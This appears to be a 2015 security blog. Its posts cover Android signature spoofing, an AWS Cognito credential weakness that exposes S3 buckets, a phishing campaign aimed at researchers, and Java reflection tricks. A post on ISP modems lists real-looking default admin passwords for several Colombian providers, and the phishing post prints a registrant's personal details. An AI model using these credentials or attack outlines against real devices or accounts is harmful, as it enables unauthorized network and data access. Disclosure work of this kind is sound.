domingo, 27 de diciembre de 2015

Spoof Packages And Signatures



I always seemed a system of identification and verification of applications and signatures as that Fix Parse for me Google always do the best job, I always ask this is really good, but if it's so good, you may be hacked or breaking ?

Yes, everything in this world is hackable, no matter who write, as they pay for it, how many devs qualifications do they do this, or few thousand dollars cost them their study, everything is hackable, one must examine the problem and break it.

I think this is really dangerous, you can create fake applications that behave like the original, accessing tokens or keys which are validated by this kind of protection.

Really this protection sucks and is be used for large companies around the world, Google is only the tip of the iceberg.

Github: SpoofPackagesAndSignatures

sábado, 12 de diciembre de 2015

How To Hack 310 Billion Dollar Company


Well again big guys with bad security practices, this time Amazon AWS S3 service.

The problem is the following, Amazon implements since SDK 2.2.5 to 2.2.8 for Android the class CognitoCachingCredentialsProvider, this class was created for an type of authentication, but this authentication is very insecure, uses an context, to get the package name, identityPoolId and region; With this insecure authentication you can get, put, modify, delete and list bucket's and files in all S3; Only need extract the identityPoolId and create a fake app with the same package name of the original app, and ready !!!

sábado, 26 de septiembre de 2015

Hacking Throughout Latin America




Recently I was doing some tests with modems supplied by the ISP's in my country, specifically with the model "Technicolor TC7300", this modem is provided by many companies in Colombia and throughout Latin America, the problem of this modem is as follows:

The ISP in Colombia always refuse to give the password to users, so they the same change, for better security, however these companies use bad practices when choosing passwords in some cases use the same password for all modems across the country, in other cases the identification numbers of the customer, other than these passwords are easy to break, this device can be hacked through brute force method to get your password.

Just imagine a bot breaking passwords throughout Latin America, accessing the settings without permission mixed success of their modems and forwarding for all of your internal network to all ports, after this, imagine the rest.

Passwords used by companies in Colombia are:

- CLARO:
User: admin | Pass: Uq-4GIt3M | Pass: Swe-ty65 | Pass: RdET23-10 | Pass: TmcCm-651 | Pass: Ym9zV-05n | Pass: 1234 | Pass: 12345

- UNE:
User: admin | Pass: d3c0ntr0l | Pass: Cpe04Epm | Pass: CPE# + numbers
User: gestionune | Pass: g3sti0nr3m0t4
User: admin-UN3 | Pass: CM4CC3SS

- MOVISTAR:
User: admin | Pass: 6 numbers

- ETB:
User: administrator | Pass: customer phone number
User: customer | Pass: ClienteETB + year


This PoC (Proof of Concept) requires configuring TOR to run.


viernes, 4 de septiembre de 2015

Threat Target: Security Researchers

Several of our researchers received these LinkedIn invitations themselves with a fake recruiter profiles, someone is doing a mapping about Security researchers; I wondered who would want to attack these people, some days ago I received a fake email from fake accounts he pointed to phishing sites, ask me: this will be related, I said sure if someone is mapping overall security researchers accounts then let them phishing, but it is strange this must be analyzed more thoroughly, I did that deep down there is something that smells worse.


Jennifer White Fake Profile


Lea David Fake Invitation


List Fake Profiles


Fake Customer Message

Fake Customer Message for do Phishing

Phishing Site

The WhoIs about this Phishing host:

Domain Name: TNCPKHARGONE.COM
Registry Domain ID: 1832762529_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-10-28T06:56:32Z
Creation Date: 2013-10-28T06:55:31Z
Registrar Registration Expiration Date: 2015-10-28T06:55:31Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited

Registry Registrant ID: 
Registrant Name: Mayank Shah
Registrant Street: hemkunt colony
Registrant City: Delhi
Registrant State/Province: Delhi
Registrant Postal Code: 10027
Registrant Country: India
Registrant Phone: 011462011
Registrant Email: mayankshah1986@hotmail.com

Registry Admin ID: 
Admin Name: Mayank Shah
Admin Street: hemkunt colony
Admin City: Delhi
Admin State/Province: Delhi
Admin Postal Code: 10027
Admin Country: India
Admin Phone: 011462011
Admin Email: mayankshah1986@hotmail.com

Registry Tech ID: 
Tech Name: Mayank Shah
Tech Street: hemkunt colony
Tech City: Delhi
Tech State/Province: Delhi
Tech Postal Code: 10027
Tech Country: India
Tech Phone: 011462011
Tech Email: mayankshah1986@hotmail.com

Well ask to Google: https://goo.gl/MV0yHr 

And google shows an list online pharmacy and Hindu things = Phishing

And do a reverse WhoIs: http://goo.gl/P4Rvkx and this say me, this guy buy other 17 domains, maybe for phishing too.

Google Plus Profile

Facebook Profile

LinkedIn Profile

Phishing Site Scan Report

The next step, puts on contact with GoDaddy.com Abuse email abuse@godaddy.com and catch this stupid guy, good luck idiot ;)

Virus Total Report: https://goo.gl/NnJN3E

Source Article: https://labsblog.f-secure.com

lunes, 24 de agosto de 2015

The theory of the Dark Ether

Recently we've been doing some testing with OpenSSL and MetaProgramming, which has put us to think about the structures and the manner in which programming languages and software functions; we prove that the properties in Java classes can be modified in real time, adding or deleting flags, this left us with a question, whether this can be done, what things could be done more?

In particle physics we have seen that the atoms are formed by electrons, protons and neutrons, which in turn are composed of quarks and leptons, which are the fundamental constituents of matter, we have seen how quantum mechanics explains how operates the subatomic world, we also see that detailed exceptional properties under certain conditions for certain items, our real world is made up of particles only and is not a solid world as many believe, other physical theories argue that matter is energy vibrating at different frequencies, heat, sound, light, that made us think about whether this could apply to software and programming languages.

Which is the software: they are simply a representation of objects in binary structures of 0 and 1, which are grouped in multiple ways to run something, the software can develop in multiple forms, Linear, Object Oriented Programming (OOP), Agent Oriented Programming (AOP), Aspect Oriented Programing (AOP), Language Oriented Programming (LOP) and others.

Initially our research was to see what could be done with classes, that are already compiled into a binary, during this test created a library called #Morpher this allowed us to access a more friendly way MetaProgramming wing without writing much code, with 5 lines was possible to cover an entire class and change properties at will.

This gave us a very crazy and strange idea, what if we could create a language and / or library that could do more strange and unusual things, which were light, fluid, amorphus, unregulated, untraceable, that could change fields, methods, constructors and classes, which could be introduced in any language and / or platform, this gave us the idea of something called #DarkEther that could be a single library or a programming language.

#DarkEther This is something that could change the concepts we've had for years about the software, it seems really interesting topic, so that's why we decided to dedicate some time to this research and the possibilities this theory, if this results in what we're thinking we could probably do #BlackMagic with the software on real-time , modifying it and transmuting it into what we want, and if we mix it with IA, the possibilities would be endless, this could create new unexplored areas in computing science, security and vulnerability analysis.

If you want to move an immovable object, stop something unstoppable and change something unchangeable, you need change the properties of that element.

Dark Ether

sábado, 22 de agosto de 2015

Why my publications appear as Jheto Xekri

The reason name "Jheto": Many years ago there was a tv show called "The Highwayman (1988)", this guy is Mark "Jacko" Jackson, my old friends confuse "Jacko" by "Jheto" and "Xekri" is the last name of an old avatar, this is the reason.

Mark "Jacko" Jackson


video
The Highwayman Opening

Greetings to all my old friends.

Changing the Language Rules

For years we have seen countless attacks on various platforms, in this case explain one in Java, which can be reproduced in other languages ​​and platforms; all developers and security analysts take for granted the fact that if programs well your code can keep you safe, the truth is not true, everything can be transformed from something immutable to something mutable, and then changed into what you want now reflections support the many languages ​​among them are Java, JavaScript, Objective-C, Perl, PHP, Python, R, Ruby, C# and others.

Just imagine what would happen if an application could change the default Java or may access protected and hidden features, imagine that someone makes are the other way round Boolean = false true, false = true, the numbers have different values 0 = 1, 2 = 0, etc., or worse to a function FINAL or PRIVATE and it is not, is really simple, this is possible and someone will make a large scale, but it is already doing.

Below we will show some pictures that prove and describe our Morpher lib.

An class on other package

Runtime modification

Morpher library

Tests

The truth is only one, can change whatever we want wherever we want, modify constructors, methods and fields and be turned on hooking classes/methods, overwrite classes/methods and bypass more things on the source code at runtime.

jueves, 13 de agosto de 2015

The Beginning of the Age of Digital Chaos

It is well known throughout the community of security researchers in industry very bad practices are used, in the case of mobile devices 90% of applications they are vulnerable to multiple attacks scams, often large companies much development software very insecure, they are from exposing user data to expose credit card numbers, in desktop and server applications, it is exactly the same, duarante some time we have been researching about this and we have seen that there are other platforms that could be attacked, a typical case is that of the ATM, which work with Windows XP, we all know that is not the most secure operating system that has exist, investigate more on the subject and we found that there are other much more critical software that can expose much more serious things the user accounts, email or credit card, in the case of embedded systems, Cloud and RTOS.

We have been observed that, CLOUD, SCADA (Supervisory Control and Data Acquisition) RTOS (Real Time Operating System) and Embeded systems, are implemented in systems critical systems, which can trigger a global catastrophe, there are multiple methods that could be used to attack these systems.

I think these systems are fully of security flaws that nobody has seen, not even the developers know that it is there.

Speaking of bad practices carried out by industry and governments to use Windows as the operating system for critical systems, a typical example is the US government that continues to use Windows for your things, I think it's really bad to have a windows in a security agency or military department.

Moreover we have some good practices by the military industry which bases its systems on Linux platforms with DO-178B certification, this dependent nuclear reactors, missile batteries, warplanes and other military equipment critical, this left me a question, well I've seen some news about attacks on military equipment and critical systems and reactors nuclear and more, ask me something, this is really safe or people afraid make a deep analysis and find that is another system operating that can be attacked and violated ?

I know this post, many guys of DoD and other governments going to hate me, perhaps this will bring me many problems and put me in the eye of the hurricane, but my task is to create secure things, improve the software and expose those that are not already received some messages about this, few other former military and civilians.

For a long time we have seen how hack cars, cell phones, PCs, servers and am 100% sure that this also applies to embedded systems, CLOUD, SCADA and RTOS. 

Which is an RTOS: it is basically a linux that works in real time and some versions are safer than others, some designed to never collapse and some not so, but basically it is a linux that works with binary ELF (executable and linkable format) and these binaries either way can be attacked.

Initially we have been working on a project called #VectorAttackScanner which will be the first product of our company Vector Xtreme Technologies (VXT), which was initially centered on the detection vulnerabilities in mobile devices and operating systems such as Windows and Linux, started this project because they all know that there are guys who can violate the security of memory protections such as RELRO, PAX, ASLR, DEP, PIE, NX, SSP, StackCanary among others more, because we think that a small idea, what if we create something that tells us where we can attack and that you should be improved so that they do not, and that's what makes our tool.

For all these reasons we have decided to expand our target to the analysis of SCADA, embedded systems, RTOS and CLOUD, to provide a tool for the analysis of problems in critical systems, we do not want one of these days, get some crazy and give him by blowing a pair of nuclear reactors or just trigger a third world war, we all know that in this world there are motherfuckers get up every day looking forward to watch the world burn.

Only two things: are just busting software that is poorly developed and that all ensure that something is safe does not make it safe, so have all certifications in the world.



By Jheto Xekri


sábado, 9 de mayo de 2015

The new policy adopts for my new tools and PoC's

Because companies, magazines and conferences do not pay attention to security reports that I totally free, as he begins to develop tools without taking into account who hurt them and how many people affected, publishes source as code it becomes for all Have fun with this.

If some companies are beginning to be attacked with my PoC's or tools dont ask why, i try to do good guy, but i get tired ...

I'm not doing anything illegal, if people want to commit crimes with my PoC's or tools, that's their problem not mine, good luck for youre devs and security guys (y)


OldSchoolComeBack

This is a repo about my security bypass report "Old School Come Back"

This is only a Proof Of Concept to demonstrate how is possible massively clone: Credit Cards, FingerPrints, and more ID devices.

I ending a FingerPrintHook, SmartCardHook, PluggedHook, and HumanInterfaceDeviceHook, coming soon i pulish the PoC (Proof of Concept).

Repository: OldSchoolComeBack

VectorAttackScanner

This is a tool to analyze android, linux and windows, to detect points to attack, as intents, receivers, services, processes and libraries.
This tool uses a static analysis methods to do this, the vector attack founded by this tool, can be attacked by fuzzing methods to discover vulnerabilities..

More security researchers, bug hunters, exploit writers, malware developers find a problems as unsecure compilation flags, methods/functions exposes, with this tool is more easy, this tool search by you automatically.

It is well known in the world of IT Security, that have been created countermeasures and memory protections to prevent easily create exploits and prevent programmers to write programs that execute arbitrary code, as RELRO, PAX, ASLR, PIE, NX, SSP, StackCanary and others, this tool search this flags to do the job.

For now this tool only check ELF Binary Format, searching RELRO, PAX, PIE, ASLR, NX, RPATH, RUNPATH, StackCanary and FORTIFY SOURCE protections.


How To Hack 85 Millon Dolars Company

The security facebook team respond me, is not a security flaw, i think more guys on the network loved this ...

For facebook security team, is acceptable security risk that any idiot can hack any database developed with Parse.com SDK.

You have to be a idiot, if is "acceptable security risk", that any attacker can list, update and delete any data on their systems.

The behavior you're describing is not a security/privacy risk ??? WTF ??? what think facebook is an risk ???

Well, The Center for Advanced Security Research Darmstadt (CASED), confirms my discover Security Flaw, check the article published on the Security Scorecard Blog: The Calm Before the Mobile API Data Breach Storm



Dissamble Part 1/2:

ProofOfConcept Part 2/2: